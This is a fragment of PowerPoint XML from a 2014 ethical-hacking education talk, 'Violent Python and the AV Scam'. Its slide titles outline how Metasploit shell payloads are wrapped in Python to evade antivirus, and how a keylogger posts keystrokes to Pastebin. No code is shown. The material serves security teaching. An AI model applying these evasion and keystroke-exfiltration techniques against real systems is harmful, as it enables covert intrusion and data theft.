              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attending other training events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In-class presentations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Researching other tools or techniques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35681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Grading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26228" y="1600200"/>
            <a:ext cx="4530847" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Must achieve a level of points to get a good grade</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Many possible combinations of projects can get there</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>May skip the final exam</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screen Shot 2014-06-22 at 1.51.1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91" y="0"/>
            <a:ext cx="1784826" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="4F81BD"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Screen Shot 2014-06-22 at 1.51.52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9566" y="0"/>
            <a:ext cx="2264434" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="4F81BD"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28020983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876</TotalTime>
  <Words>843</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>175</Paragraphs>
  <Slides>76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76</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="77" baseType="lpstr">
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Violent Python  Innovations in Cybersecurity Education Workshop   June 24, 2014</vt:lpstr>
      <vt:lpstr>Bio</vt:lpstr>
      <vt:lpstr>Pedagogy</vt:lpstr>
      <vt:lpstr>Diversity in Education</vt:lpstr>
      <vt:lpstr>Beginners</vt:lpstr>
      <vt:lpstr>Average Students</vt:lpstr>
      <vt:lpstr>Advanced Students</vt:lpstr>
      <vt:lpstr>Independent Projects</vt:lpstr>
      <vt:lpstr>Grading</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>CNIT 124 Advanced Ethical Hacking</vt:lpstr>
      <vt:lpstr>Two Textbooks</vt:lpstr>
      <vt:lpstr>Violent Python</vt:lpstr>
      <vt:lpstr>Violent Python</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Projects</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Antivirus  Ungh!  Good God y'all...  What is it GOOD For?</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Mikko Hypponen Video</vt:lpstr>
      <vt:lpstr>Metasploit Payloads</vt:lpstr>
      <vt:lpstr>Metasploit</vt:lpstr>
      <vt:lpstr>Simple Reverse Shell</vt:lpstr>
      <vt:lpstr>Antivirus Catches It</vt:lpstr>
      <vt:lpstr>Norton v. Shell.exe</vt:lpstr>
      <vt:lpstr>Norton Identifies the Metasploit Packer</vt:lpstr>
      <vt:lpstr>VirusTotal: 37/49 Detections</vt:lpstr>
      <vt:lpstr>How to Become 007</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Python v. AV Round 1 shell_bind_tcp</vt:lpstr>
      <vt:lpstr>Export Metasploit Payloads to C</vt:lpstr>
      <vt:lpstr>Use Ctypes Python Library</vt:lpstr>
      <vt:lpstr>Compile it on Windows</vt:lpstr>
      <vt:lpstr>DEMO</vt:lpstr>
      <vt:lpstr>DEMO</vt:lpstr>
      <vt:lpstr>VirusTotal: 1/50 Detection</vt:lpstr>
      <vt:lpstr>Norton Support</vt:lpstr>
      <vt:lpstr>Norton Wins!</vt:lpstr>
      <vt:lpstr>Kaspersky Wins!</vt:lpstr>
      <vt:lpstr>Python v. AV Round 2 shell_bind_tcp with a delay</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>DEMO</vt:lpstr>
      <vt:lpstr>Norton, Avast, &amp; MSE Lose!</vt:lpstr>
      <vt:lpstr>Kaspersky Wins!</vt:lpstr>
      <vt:lpstr>Python v. AV Round 3 shell_bind_tcp in two stages no delay</vt:lpstr>
      <vt:lpstr>Other AV</vt:lpstr>
      <vt:lpstr>Remember Mikko?</vt:lpstr>
      <vt:lpstr>F-Secure Wins!</vt:lpstr>
      <vt:lpstr>AV Challenge</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Python v. AV Round 4 shell_bind_tcp with a delay</vt:lpstr>
      <vt:lpstr>INSTRUCTIONS</vt:lpstr>
      <vt:lpstr>INSTRUCTIONS</vt:lpstr>
      <vt:lpstr>Norton Loses</vt:lpstr>
      <vt:lpstr>Kaspersky Wins</vt:lpstr>
      <vt:lpstr>Advanced Malware Protection</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Python Keylogger</vt:lpstr>
      <vt:lpstr>Google "Python Keylogger"</vt:lpstr>
      <vt:lpstr>Post Keystrokes to Pastebin</vt:lpstr>
      <vt:lpstr>Problem</vt:lpstr>
      <vt:lpstr>Kaspersky &amp; Avast! LOSE</vt:lpstr>
      <vt:lpstr>Norton WINS!</vt:lpstr>
      <vt:lpstr>But just add a delay...</vt:lpstr>
      <vt:lpstr>F-Secure LOSES!</vt:lpstr>
      <vt:lpstr>PRODUCT ANNOUNCEMENT!</vt:lpstr>
      <vt:lpstr>Ultra-Advanced APT Tool</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>UNSTOPPABLE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Violent Python and the AV Scam</dc:title>
  <dc:creator>Sam Bowne</dc:creator>
  <cp:lastModifiedBy>Sam Bowne</cp:lastModifiedBy>
  <cp:revision>212</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2014-05-22T16:10:09Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2014-06-24T06:32:55Z</dcterms:modified>
</cp:coreProperties>
</file>